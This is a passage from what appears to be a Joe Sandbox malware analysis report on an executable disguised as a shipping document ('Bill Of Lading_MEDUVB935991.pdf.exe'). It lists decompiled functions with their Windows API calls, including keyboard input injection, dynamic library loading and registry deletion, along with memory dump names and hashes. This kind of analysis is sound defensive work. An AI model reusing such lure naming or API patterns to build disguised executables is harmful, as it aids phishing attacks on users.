                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 763830540-1403004172
                                                                                                                      • Opcode ID: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                                                                                                      • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                      • Opcode Fuzzy Hash: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                                                                                                      • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                      Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                        • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentHandleProcess$Duplicate
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 2124370227-2873401336
                                                                                                                      • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                      • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                      • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                      • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                      Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                        • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentHandleProcess$Duplicate
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 2124370227-2873401336
                                                                                                                      • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                      • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                      • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                      • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                      Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                      • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                      • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                      • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                      • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                      • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                      Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                      • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1795658109-438819550
                                                                                                                      • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                      • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                      • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                      • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                      Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                        • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                        • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                        • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                        • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                      • GetFocus.USER32 ref: 004609EF
                                                                                                                        • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                        • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                      • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                      • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 991886796-1110647743
                                                                                                                      • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                      • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                      • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                      • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                      Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_sprintf
                                                                                                                      • String ID: %02X
                                                                                                                      • API String ID: 891462717-436463671
                                                                                                                      • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                      • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                      • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                      • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                      Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0042CD00
                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                        • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                        • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                        • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                        • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                      • String ID: $OH$@OH$X
                                                                                                                      • API String ID: 3491138722-1394974532
                                                                                                                      • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                      • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                      • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                      • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                      Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2449869053-0
                                                                                                                      • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                      • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                      • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                      • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                      Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                      • SendInput.USER32 ref: 0044C509
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3031425849-0
                                                                                                                      • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                      • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                      • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                      • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                      Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2095303065-0
                                                                                                                      • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                      • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                      • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                      • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                      Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2832842796-0
                                                                                                                      • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                      • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                      • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                      • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                      Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                      • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1822080540-0
                                                                                                                      • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                      • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                      • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                      • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                      Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447CD1
